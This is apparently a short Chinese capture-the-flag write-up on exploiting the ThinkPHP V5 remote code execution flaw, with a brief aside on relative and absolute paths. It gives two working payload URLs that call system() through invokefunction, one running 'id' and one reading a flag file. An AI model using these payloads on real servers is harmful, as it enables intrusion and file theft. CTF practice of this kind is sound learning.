题目
访问题目场景
我们猜测可能是ThinkPHP V5的RCE漏洞,我们直接去百度,看漏洞复现文档
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
这里存在命令执行,并且存在一个知识点,那就是相对路径
1、相对路径:顾名思义,相对路径就是相对于当前文件的路径。网页中一般表示路径使用这个方法。
2、绝对路径:就是你的主页上的文件或目录在硬盘上真正的路径。绝对路径就是你的主页上的文件或目录在硬盘上真正的路径,比如,你的Perl 程序是存放在 c:/apache/cgi-bin 下的,那么 c:/apache/cgi-bin就是cgi-bin目录的绝对路径
在网络中,以http开头的链接都是绝对路径,绝对路径就是你的主页上的文件或目录在硬盘上真正的路径,绝对路径一般在CGI程序的路径配置中经常用到,而在制作网页中实际很少用到。
以下为建立路径所使用的几个特殊符号,及其所代表的意义:
./
:代表目前所在的目录。
../
:代表上一层目录。以
/
开头:代表根目录。
index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat ../../../flag